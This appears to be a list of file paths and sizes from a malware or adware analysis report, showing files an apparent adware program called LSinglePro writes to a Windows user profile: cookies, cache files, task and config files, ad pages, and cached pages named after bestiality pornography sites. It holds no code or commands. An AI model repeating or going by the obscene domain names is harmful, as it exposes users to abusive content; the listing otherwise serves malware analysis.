C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\Z4OFGSEX.txt (96 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\I5FMQPLV.txt (390 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\z_stat[1].js (1058 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\core[1].js (763 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\os[1].js (59998 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\web[1].htm (273 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\dot[1].gif (43 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\6[1].htm (1520 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\165VQSMA.txt (158 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\stat[1].gif (43 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\hm[4].gif (43 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\irt[1].js (33 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\empty[1].gif (43 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\share[1].js (1096 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\LOVKAMR2.txt (112 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\3774651[1].htm (951 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\eb3340e4[1].htm (124 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\hm[1].gif (43 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Internet Explorer\DOMStore\5XISSK39\ent.onlylady[1].xml (411 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\NBXZ88BJ\irs01.net\mt_adtracker.sxx (102 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\hm[3].js (11729 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\cfg.ini (228 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\onlyladyomd_new2[1].htm (98 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\hm[3].gif (86 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\statisddd-min[1].js (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\tools.min[1].js (9530 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\hm[1].js (11987 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Internet Explorer\DOMStore\1HUVI2AA\wwwcdn.kimiss[1].xml (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\rclm[1].js (658 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\pv_y[1].js (677 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\search[1].js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\hm[2].js (9448 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\ads6[1].htm (300 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\jquery-1.7.2.min[1].js (39451 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sxx (554 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\6.5[1].xml (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\GlobalConfig_6.5[1].ini (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\55ee63603affb1f5f4d8e08f09be352e7da44e172e1384869d76dbf5b725b73695cee9ba28a198bdf5d219f25b7f7d1ea108d4d2513de6c36d2bd1ec2e63b933a620b3493b945ab6763eaba1302ee18996f0 (98 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\log.txt (522 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\blhash.dat.bak (1822 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\blhash_6.5.dat[1].zip (502 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\TFExecuter4\SearchEngine.ini.bak (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\bl_6.5[1].dat (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\TFExecuter4\HLR_cfg.ini.bak (10 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\TFExecuter4\GlobalConfig.ini.bak (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\6.5[1].xml (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\SearchEngine_6.5[1].ini (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\cfg_6.5[1].ini (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\runtask_6.5[1].dat (22 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\runtask.dat.bak (44 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\bl.dat.bak (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\0ad38a6488686acc96d4ec67497a33b9[1].xml (776 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\crossdomain[1].xml (261 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\NBXZ88BJ\www.iqiyi.com\qiyi_cupid.sxx (528 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\crossdomain[1].xml (227 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\9UCBFK7X.txt (1121 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\crossdomain[2].xml (227 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\ugcBodanPlay[1].js (473593 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#www.iqiyi.com\settings.sxx (711 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\DJU0K3WB.txt (110 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\SL165LVJ.txt (485 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\NBXZ88BJ\www.iqiyi.com\qiyi_settings.sxx (273 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\Tipdatavod_201610311735[1].xml (3615 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\5L8TXOO8.txt (298 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\TH4O9JKH.txt (94 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\crossdomain[2].xml (483 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\beacon[1].js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\NBXZ88BJ\www.iqiyi.com\qiyiclientflash.sxx (101 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\W16263T6.txt (95 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\NBXZ88BJ\www.iqiyi.com\qiyi_statistics.sxx (159 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\10382a1b82aa[1].swf (9099 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\clear[2].swf (8061 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\52ba69c7b1d54420bec46c52cec587c6[1].js (71885 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\ugcBodanPlay_ver[1].js (122 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\NBXZ88BJ\www.iqiyi.com\irs_ftrack_UV.sxx (104 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\NBXZ88BJ\www.iqiyi.com\irs_ftrack.sxx (91 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\1823925a82d4[1].swf (1339 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\NBXZ88BJ\www.iqiyi.com\qiyi_player_common.sxx (89 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\sea1.2[1].js (123932 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\iwt[1].js (842 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\11.0.1[1].js (104 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\irt[1].js (43 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\NBXZ88BJ\www.iqiyi.com\irs_ftrack_0.sxx (314 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\quud[1].htm (203 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\proxy[1].htm (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\hasnew[1].action (112 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\hm[2].gif (43 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\crossdomain[3].xml (170 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\NBXZ88BJ\www.iqiyi.com\qiyi_log.sxx (66 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\clear[1].swf (11138 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\1050c72eeb6[1].swf (2283 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\NBXZ88BJ\www.iqiyi.com\qiyi_histories.sxx (36 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\tanxssp[1].js (48533 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\6Y0COW66.txt (70 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\qa[1].js (4082 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\exsites[1].htm (6692 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\D6VJBQU7.txt (114 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\tanxssp[1].js (41931 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\787ab6983c8a883fa3c5190ce3cac804[1] (240 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\m[1].htm (372 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\get_msg[1].action (53 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\572044000[1] (853 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\3AYVSTOL.txt (1299 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\pcweb.wonder[1].js (155849 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\1050f98c2359[1].swf (274705 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Internet Explorer\DOMStore\WMZUWJRG\www.iqiyi[1].xml (621 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\push[1].js (281 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\ex[1].js (1950 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\572044000[1].htm (17 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\737NWARW.txt (875 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\hm[1].gif (43 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\ares2.min[1].js (49926 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\crossdomain[1].xml (227 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\PYWE1XWT.txt (679 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\mgets[1] (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\Q97SV2MA.txt (90 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\NBXZ88BJ\www.iqiyi.com\peerInfo.sxx (120 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\036300cf212b7b[1].swf (24797 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\online[1].js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\3GN6V4AY.txt (287 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\getqd[1].txt (162 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\crossdomain[3].xml (227 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\C9DWB8JN.txt (109 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\C54EWNSP.txt (679 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\00NB3MLM.txt (112 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\182321793893[1].swf (1821 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\55ZHX71Y.txt (107 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\common[1].js (145204 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\hm[1].js (13159 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\behavior[1].js (508 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\ab77b6ea7f3fbf79[1].js (478 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\videos[1] (19615 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\crossdomain[2].xml (224 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\NBXZ88BJ\www.iqiyi.com\qiyi_tips_statistics.sxx (797 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\v_19rra3jt70[1].htm (159638 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\_J.1.2.min[1].js (2221 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\S8WLVQD9.txt (1159 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\animalxxxporn_com[1].htm (9931 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\7DLSY0PD.txt (114 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\zooxxxfree_com[1].htm (17801 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\VSXW7CYA.txt (112 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\ads[5].htm (509 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\marketplace.min[1].js (2162 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\horse-fucking_com[1].htm (6826 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\DKV2LKQG.txt (114 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\adsCAPKMXHA.htm (1303 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\adsCA1B6AXU.htm (1303 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\adsCAQ2IP8F.htm (1303 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\ads[10].htm (509 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\E4M25RIQ.txt (114 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\desktop.ini (67 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\desktop.ini (67 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\adsCAWYTHJQ.htm (1598 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\ads[11].htm (1302 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\trade[1].htm (1685 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\ads[7].htm (1303 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\HLQ2ET85.txt (114 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\ads[4].htm (509 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\W0WR3OHC.txt (96 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\desktop.ini (67 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\adsCALXCOKL.htm (1319 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\ads[3].htm (509 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\adsCA29BM8A.htm (1380 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\adsCA9ZF53M.htm (509 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\ads[2].htm (509 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\KPIJS4AN.txt (90 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\ads[3].htm (1319 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\index.dat (16 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\NC9LUA4A.txt (114 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\ads[2].htm (1303 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\desktop.ini (67 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\ads[1].htm (509 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\view[1].htm (773 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\ads[1].htm (509 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\13BX1ZO4.txt (93 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\animalpornlovers_com[1].htm (11694 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\ads[9].htm (509 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\adsCA21LIVA.htm (509 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\pupfurt[1].js (3383 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\ads[8].htm (1302 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\adsCAELQCT9.htm (1302 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\ads[6].htm (509 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\adsCATLST9F.htm (509 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\LVD54K8A.txt (114 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\adsCAKIH50N.htm (1558 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\desktop.ini (134 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\trade[1].htm (290 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\adsCA49G7SK.htm (1318 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\BMICP5BU.txt (114 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\adsCA6O43T9.htm (509 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\R2NAZKTU.txt (114 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\DIR5SLH7.txt (93 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\2S9NB1AJ.txt (114 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\adsCAIOPKDC.htm (509 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\J89LT4OF.txt (91 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\c=n;dst=1;et=1484906144842;tzo=-120;ref=http://coinsns.com/index.php?s=/lottery/index/index.html;url=http://blockadz.com/ads/show/show[1].g (35 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\f[1].txt (107177 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\JR8GKFX8.txt (115 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\index[2].htm (4357 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\show[3].htm (746 bytes)
